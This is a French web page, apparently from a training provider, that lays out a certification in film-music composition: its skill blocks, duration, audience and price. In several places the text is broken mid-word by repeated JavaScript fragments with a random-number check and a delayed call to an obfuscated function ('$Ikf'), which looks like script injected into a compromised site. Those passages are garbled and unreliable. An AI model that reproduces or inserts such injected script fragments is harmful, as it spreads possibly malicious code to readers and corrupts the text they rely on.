L’objectif de la certification est de maîtriser les techniques spécifiques de la composition de musique de film d’animation, de fiction et de documentaire pour garantir l’aptitude et la qualité du compositeur de musique de film.

Cela se traduit par une souplesse de style et une rapidité d’exécution, se faisant parfois même oublier du spectateur. Le compositeur de musique de film sait composer et jouer avec l’image et l’ambiance d’une scène visuelle en amplifiant les messages qui veulent être transmis par le réalisateur.

De fait, la composition de musique à l’image n’a cessé de s’accélérer ces dernières années avec la multiplication des courts et longs métrages et la pleine expansion du domaine cinématographique. La facilité d’accès aux outils technologiques de composition de musique sur ordinateur ne fait qu’amplifier la quantité de compositeurs peu qualifiés. Cependant, la composition de musique de film nécessite de vraies compétences et spécificités qui d’une part ne s’improvisent pas,  et d’autre part sont particulièrement recherchées par les producteurs de télévision. Les studios de production et post-production ont donc réellement besoin de compositeurs de musique de film correctement formés et opérationnels sur différents types de production (court-métrage, long-métrage, documentaire, fiction, …).

La certification de compositeur de musique de film

Notre certification se décompose en quatre compétences principales : 

Accroître sa culture musicale

  • Maitriser le solfège pour communiquer avec les musiciens
  • Programmer, arranger et/ou orchestrer la musique pour la jouer et la faire jouer
  • Maîtriser les caractéristiques des instruments pour assurer une bonne sonorité orchestrale

Fusionner, optimiser, finaliser sa musique avec l’image

  • Comprendre une scène de film / analyser un scénario pour proposer une musique cohérente
  • Dégager l’atmosphère musicale pour apporter sa créativité au service de l’œuvre
  • Moduler le thème selon les scènes pour créer une identité musicale
  • Harmoniser les mélodies pour enrichir la sonorité
  • S’adapter à différents styles de musiques et différents supports de film (documentaires, publicité)
  • Réaliser des œuvres musicales pouvant utiliser des voix, des instruments, des sons, des dispositifs mixtes, informatiques, électro-acoustiques, électroniques.
  • Transposer une composition vers d’autres nomenclatures instrumentales, vocales et d’autres dispositifs, la retravailler pour une application particulière, éventuellement dans sa forme.
  • Echanger avec les réalisateurs, producteurs, scénaristes pour évaluer les attentes et y répondre

Maîtriser les connaissances liées à la production musicale

  • Créer une bibliothèque de sons
  • Préparer et configurer le studio d’enregistrement : connaître les techniques de prise de son
  • Manier certaines technologies : pour la spécialité instrumentale et l’arrangement : connaître et manier les logiciels fondamentaux du traitement du son et de l’informatique musicale, s’exercer à un travail sur la matière sonore : arrangement, re-masterisation
  • Enregistrer des bandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andes sons avec un matériel adapté
  • Ajouter des instrumentations par l’utilisation de logiciels de MAO
  • Utiliser les outils numériques de référence et les règles de sécurité informatique pour acquérir, traiter, produire et diffuser de l’information de manière adaptée ainsi que pour collaborer en interne et en externe
  • Mettre en oeuvre, réaliser : planifier son travail, maîtriser les codes d’écriture de son champ musical, prendre en compte les exigences liées à la participation de partenaires extérieurs éventuels.

Structurer sa carrière

  • Identifier ses axes de progression. Etablir une stratégie de carrière, définir ses priorités.
  • Valoriser son parcours pour se faire connaître. Créer un support de communication vidéo et audio, rédiger une biographie.
  • Créer son réseau pour être informé des opportunités
  • Évaluer et s’auto-évaluer dans une démarche qualité
  • Situer sa démarche artistique : Identifier les grandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ands courants de la création actuelle, positionner sa démarche de création au regard de ceux-ci.
  • Calculer son devis de composition et de réalisation en fonction du type de production, évaluation des droits d’auteur à percevoir.
  • Connaître les aspects juridiques et réglementaires de la profession. Maîtriser la contractualisation, commandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ande, édition, déclaration Sacem, interprétation et la protection juridique en cas d’impayés.
  • Répondre à des situations de commandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ande, les provoquer : analyser les modalités de mise en œuvre d’un cahier des charges, en mesurer la faisabilité et les éventuelles adaptations nécessaires.
Diplôme de musique de film

Durée

Par stage de cinq semaines

Ou par cours particulier pendant une année

Public

Compositeurs souhaitant acquérir la spécialisation de musique de film

Budget

2 400€

Formation éligible au CPF sous réserve d’acceptation à l’inventaire par la CNCP.